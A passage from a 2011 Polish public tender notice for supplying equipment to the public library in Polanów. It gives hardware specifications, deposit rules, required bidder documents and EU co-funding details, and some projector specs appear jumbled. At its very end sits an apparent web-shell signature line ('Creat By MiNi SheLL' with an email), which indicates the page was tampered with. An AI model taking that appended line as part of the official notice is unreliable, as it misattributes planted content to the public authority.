Pakiet bezpieczeństwa x1szt. CD-DVD	antywirus, antyspyware, zapora osobista, ochrona przed spamem -  licencja na 15 stanowisk obowiązująca przez okres gwarancji - min. 36 miesięcy.
5.  Projektor
Dane techniczne projektora:
Rozdzielczości podstawowe minimalne:
zgodność z systemami obrazu  PAL (625-576i-p), HDTV (720p, 1080i)
Proporcje obrazu: 4-3 oraz 16-9 min. Kontrast 2000:1
Typ lampy i żywotność lampy: Lampa LED o trwałości min. 20 000 godzin - tryb jasny
Gniazda Wejścia-Wyjścia
PC RGB   15-stykowe gniazdo D-Sub VGA
S-Video   4-stykowe gniazdo Mini DIN
Dźwięk stereo   gniazdo Mini Jack  wbudowany głośnik: 1 głośnik 1WXGA 1024x 768) USB min. wbudowana pamięć 4GB
Gwarancja: 3 lata gwarancji producenta
torba do przenoszenia projektora
60 minut pracy na baterii i do 5 godzin na akumulatorze
Pilot, funkcja myszy i bezpośredni wybór źródła sygnału wejściowego.
6.Ekran ścienny  rozwijany ręcznie o wymiarach 2000 x 2000 mm.

Zadanie III obejmuje: Dostawę i instalację urządzenia wielofunkcyjnego:
1.Prędkość kopiowania 	Min. 20 stron A4-min kolor
Min. 20 strony A4-min mono
2.Rozdzielczość kopiowania	600 dpi x 600 dpi
3.Pamięć operacyjna	Min. 1,5 GB RAM
4.Dysk twardy	Min. 80 GB
5.Format oryginału	od A5 do A3
6.Format kopii	od A5 do A3 
7.Czas nagrzewania	Max. 30 sekund
8.Czas pierwszej kopii	Max. 10 sekund
9.Kopiowanie ciągłe	od 1 do 999
10.Gramatura papieru	Min. 80 - 280 g-m2
11.Natężenie obrazu	automatyczne i ręczne
12.Zoom	25% do 400%, w krokach co 1 %
13.Inne funkcje	tryb foto, auto wybór papieru, auto przełączanie podajników papieru, auto start, kierunkowa zmiana rozmiaru, rotacja obrazu, sortowanie elektroniczne
14.Kody dostępu dla użytkowników	Min. 999 kodów
15.Podajniki na papier	Min.  Trzy  uniwersalne zasobniki na papier od A5 do A3 na min. 1200 arkuszy 80 g-m2,    
16.Obsługa	Min. 8,5cala kolorowy panel LCD w języku polskim 
17.Dupleks	Min. od A5 do A3 o gramaturze 64-256 g-m2
18.Automatyczny podajnik dokumentów dwustronnych	Min. 100 arkuszy 80 g-m2
19.Podstawa pod urządzenie	Metalowa na kółkach, zintegrowana z urządzeniem
1.Prędkość 	Min. 20 stron A4-min kolor
Min. 20 strony A4-min mono
2.Gramatura papieru	Min. 80 - 280 g-m2
3.Jakość druku	Min. 600 dpi x600 dpi
4.Pamięć	Min. 1,5 GB RAM
5.Języki opisu strony	Min. XPS, PCL6 i  PostScript3
6.Interfejs	USB 2.0 
7.Zgodne systemy operacyjne Windows 98SE Me NT4.0 2000 XP 2003 Server Vista (32 bit), Mac OS 8.6-9.x, Mac OS X 10.1 i wyższe, CUPS, Netware 5.1-6.5, Citrix MetaframeXP, SAP, AS-400-, Linux-Unix
8.Karta sieciowa	Ethernet 10-100 BaseTX
9.Gniazdo USB	Bezpośrednie drukowanie z nośników pamięci USB typu PENDRIVE
10.Standard sieci bezprzewodowej	Wi-FI IEEE802.11b-g
Charakterystyka skanera	
1.Prędkość skanowania	Min. 50 skanów A4-min  w trybie kolorowym i czarno-białym
2.Formaty plików	JPG, PDF, TIFF, multi- TIFF, XPS
3.Typ oryginałów	tekst, foto, tekst+foto, 
4.Rozmiar oryginałów	od A5 do A3
5.Rozdzielczość	Min. 600 dpi, kolor (8 bit) lub mono
Dodatkowe minimalne wymagania
1.Urządzenie musi zawierać pełnowydajne materiały eksploatacyjne.
2.Oprogramowanie OCR w wersji serwerowej bez limitu użytkowników lub urządzeń, musi być zintegrowane z oferowanym urządzeniem-przetwarzanie skanowanych dokumentów do formy edytowalnej  min. doc, rtf, xls, csv, PDF bez ingerencji użytkowników w proces przetwarzania, a także przesyłanie do folderów docelowych.
4.Gwarantowany czas reakcji serwisu od momentu zgłoszenia awarii 6 godzin roboczych.
Dostawca podczas awarii dłuższej niż 10 godzin roboczych zapewni urządzenie zastępcze.
Zdalne monitorowanie serwisowe urządzenia  poprzez wykorzystanie sieci użytkownika.
(automatyczne powiadamianie użytkownika e-mailem o licznikach kopii-wydruków)
Możliwość zarządzania urządzeniem przez sieć, filtrowanie adresów MAC i IP, wydruk poufny i planowany..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-0, 32.20.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości : 
Zadanie I  - 2000,00 zł 
Zadanie II - 2000,00 zł 
Zadanie III - 2000,00 zł 
2.Wadium można wnieść w jednej lub kilku następujących formach przewidzianych w art. 45 ust. 6 ustawy.
3.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.Wadium w pieniądzu należy wnieść na konto Zamawiającego:
Bank Spółdzielczy Sławno Oddział Polanów nr 19 9317 1038 3900 0996 2000 0039
z dopiskiem -Wadium - Zakup wyposażenia do Biblioteki Publicznej w Polanowie.
5.W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.
6.Kopię przelewu należy załączyć do oferty.
7.W przypadku wniesienia wadium w formie innej niż pieniądz - wykonawca w ofercie składa kopię dokumentu (potwierdzoną za zgodność z oryginałem) oraz oryginał, który nie będzie w sposób trwały związany z ofertą (np. w oddzielnej kopercie z napisem (wadium), co umożliwi Zamawiającemu zwrot (odesłanie) dokumentu potwierdzającego wniesienie wadium, przy zachowaniu nienaruszalności oferty.
8.Jeżeli wadium zostało wniesione w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z rachunku bakowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
9.Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 13.
10.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
11.Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
12.Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt. 9, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
13.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli: 
-Wykonawca, w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie,
-Wykonawca, którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że zrealizował, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 dostawę o podobnym charakterze i wielkości niniejszego zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany ogólne:
a) zmiana adresu siedziby Zamawiającego - Wykonawcy
b) zmiana osób występujących po stronie Zamawiającego - Wykonawcy
c) zmiana w kolejności i terminach wykonywanych robót
d) za zgodą Zamawiającego - możliwość zmiany podwykonawcy,
e) za zgoda Zamawiającego - zmiana osób uczestniczących w wykonywaniu zamówienia, pod  warunkiem, że będą posiadały co najmniej takie same uprawnienia.
2. Terminu wykonania zamówienia:
a)  z przyczyn losowych: np. trwałe uszkodzenie  dostawy na skutek wypadku drogowego
b) podpisanie umowy o dofinansowanie ww. inwestycji w ramach Programu Rozwoju Obszarów  Wiejskich na lata 2007 - 2013, zmieniającego zasady i terminy jej realizacji,
c) wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych, 
  strajku generalnego, mającego  wpływ  na realizację przedmiotu zamówienia.
d) zmiana kolejności i terminów wykonania umowy,      
3. Zmiany wynagrodzenia:
a) zmiana stawki podatku od towarów i usług (VAT).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.polanow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Polanowie
ul. Wolności 4
76 - 010 Polanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2011 godzina 10:00, miejsce: Urząd Miejski w Polanowie
ul. Wolności 4
76 - 010 Polanów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2007-2013, Oś Priorytetowa 5  Turystyka, kultura, rewitalizacja, Działanie 5.2.  Rozwój kultury - ochrona i zachowanie dziedzictwa kulturowego, Poddziałanie 5.2.1. Rozwój odtworzenie infrastruktury kultury wraz z systemem informacji kulturalne..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com